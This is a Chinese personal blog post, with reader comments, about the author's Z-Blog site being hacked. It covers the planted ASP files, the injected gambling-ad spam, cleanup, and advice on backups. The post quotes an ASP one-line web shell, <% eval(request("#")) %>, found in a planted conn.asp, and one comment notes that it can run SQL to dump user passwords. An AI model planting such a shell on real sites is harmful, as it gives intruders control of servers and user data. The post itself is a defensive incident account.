当前位置:首页 » 网赚项目 » 正文

分类页和文章页“当前位置”下方广告(移动版)

爱小志博客网站被黑及其应对

136 人参与  2013年04月15日 16:34  分类 : 网赚项目  评论

今天中午12点多用手机访问我的网站还是好好的,等到下午4点多来打开网站的时候,发现网站打开之后,页面错位乱码,原来是网站被黑客攻击了,于是,我立刻用FTP软件登录虚拟主机空间,并且,按照时间顺序排列文件。发现果然不对劲,有人在我虚拟主机空间上传了一个index.asp文件,然后我查看z-blog 2.1原版源码程序,发现并没有index.asp文件,所以,我断定,这个肯定是黑客上传上上去的,于是,我把这个文件立刻删除了,在访问网站的时候,果然能够正常访问了。另外,我看见还有一个文件夹名称为“inc”,其日期是今天最新的日期,我打开进入,发现里面有一个文件名称是coon.asp,但是,我查看原版的z-blog程序,发现并没有一个文件夹是inc,所以,我就果断把这个文件删除了。

下面图片是我网站被攻击之后打开的页面:

image

我们发现,其中有一些乱码的字符,比如“��?”,“br>”等等,之后,我又查看了网页的源代码,发现在代码的底部,挂的全部都是“博彩”和“赌场”的网站广告代码,

image

这个情况,应该说我不是第一次遇见了,但是,网站打开之后是乱码的情况还是第一次出现,以前我有个网站也是挂的什么淘宝商城或者是什么医疗机构,或者是什么博彩网站的广告,但是都是隐藏起来的网站链接和代码,一般我们直接打开网站之后不能直接看见这些链接,所以,我们也通常很难发现这些恶意广告链接,这些隐藏的恶意链接,很容易造成我们网站被百度,谷歌等网站降权,甚至网站被K,所以,我们需要经常查看自己的网站首页源码,最好是下载查看和分析网站日志。

另外,我通过把inc文件夹里面的的conn.asp文件下载到本地,用记事本打开之后,发现里面的代码只有一段,如下图:

image

我们通过在百度搜索这段代码,发现果然有很多网站有被挂上这段代码:

image

而且,很多挂上这个代码的,都是网站的首页标题,不得不说,网站管理员到底干哈去了?

爱小志估计代码中的“qweqwe1”应该是一个人的网络用户名,于是我们在百度搜索qweqwe1:

image

发现用户名称带有“qweqwe1”字符的果然不在少数,光搜索结果就达到了2万多条,这说明,用户名为qweqwe1的黑客真的是很嚣张!

还有,我们搜索“eval request”果然真相浮出了水面:

image

答案是“<% eval(request("#"))%>这句话是一句话小马的服务端,入侵者能利用lake2的客户端进行连接,从而得到一个网站的最高权限,更甚至,拿下这台服务器,注意站点的安全了lz”,黑客已经拿到了网站的服务器控制端。

通过这些分析,我们已经大概知道了网站服务器的问题,所以,爱小志认为,作为站长的我们,需要加强网站的安全的管理,就像这篇文章所说的《关于网赚——我想对大家说的》“黑客可以决定一个网站的生存”,所以,作为站长,尤其是个人站长的我们,需要经常对网站进行备份,备份最好是对整站进行备份,如果可以,每天都需要备份一次数据库,每周备份一次网站所有文件。备份其实很简单,只需用FTP软件登录网站虚拟主机空间,下载mdb数据库即可,其中,z-blog的数据库文件路径为:zb_users\DATA\***.mdb,其中***为您数据库的文件名称。

后记:作为个人站长其实很不容易,树大招风,何况爱小志这棵树还没有“发芽”,几乎就要被黑客扼杀在襁褓之中,究竟是爱小志得罪了各位,还是各位竞争对手网站看不惯爱小志博客呢?

另外,如果您有更好的应对措施,可以在下方给我们留言,谢谢!

来源:艾乐博客(微信/QQ号:178551440),转载请保留出处和链接!

本文链接:http://www.ailen.cn/?id=68

文章底部广告(移动版)
百度分享获取地址:http://share.baidu.com/

本文标签:爱小志博客  网站被黑  

加入【网络营销联盟】QQ群:59514883(加群验证:后海博客)

这里的内容可以随意更改,在后台-主题配置中设置。

百度推荐获取地址:http://tuijian.baidu.com/,百度推荐可能会有一些未知的问题,使用中有任何问题请直接联系百度官方客服!
<< 上一篇 下一篇 >>
评论框上方广告(PC版)
评论框上方广告(移动版)

  • 评论(11)
  • 相关文章

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
  • 1楼 音乐人生网赚 2013-04-15 19:28:04 回复
    我说下午来你的博客 怎么是这样呢 以为是 主机有啥问题呢 呵呵
  • 2楼 PHP程序员 2013-04-15 22:18:33 回复
    还好及时发现了,要么百度收录猛增,都不知道怎么回事,原来都给别人做宣传了。
  • 3楼 loveseatao 2013-04-15 22:22:27 回复
    您知道有啥防黑技巧吗?
  • 4楼 智慧网赚 2013-04-15 22:29:01 回复
    来问候下。
  • 5楼 王攀网赚博客 2013-04-15 23:16:43 回复
    很好的经验,以后自己也嫩个多多防范呢
  • 6楼 小虾网赚 2013-04-16 14:34:13 回复
    恩恩,多多积累经验!
  • 7楼 吵吵 2013-04-17 22:51:50 回复
    7年前就玩过一句话木马,到今天了还存在呢。qweqwe1只是发送的一个变量。如果这个变量是一句sql语句,如select * from users那么所有的用户名和密码都会显示出来。
  • 8楼 loveseatao 2013-04-18 07:03:18 回复
    那站点是如何防止呢?
  • 9楼 好千度兼职网 2013-04-19 09:26:50 回复
    要不是今天来你的博客看看,我还不知道我的网站被黑了,网站底部出现很多百家乐等广告,我以为是系统临时添加的,结果FXP查看下发现和你的一样,有个文件被修改过,日期在三月底,坑爹啊!!!赶紧删除,再把那个文件上传。接着修改FXP密码空间登录密码,我擦,这事我都能碰见!
  • 10楼 loveseatao 2013-04-19 16:17:41 回复
    以后日子还长着呢!要多多注意!
  • 11楼 吵吵 2013-04-19 22:10:25 回复
    具体怎么得到权限有很多方法和漏洞,一时也说不完,我原来玩黑客的时候就是因为想象空间非常大,各种意想不到的技术层出不穷。这个要具体分析的,你要搞更多的资料分析。

我是标题

    内容的形式各种各样,可以是文本,也可以是各种广告等。

网赚博客 | 网赚论坛 | 任务赚钱 | 挂机赚钱 |

Powered By 艾乐博客 版权所有 辽ICP备11008011号-1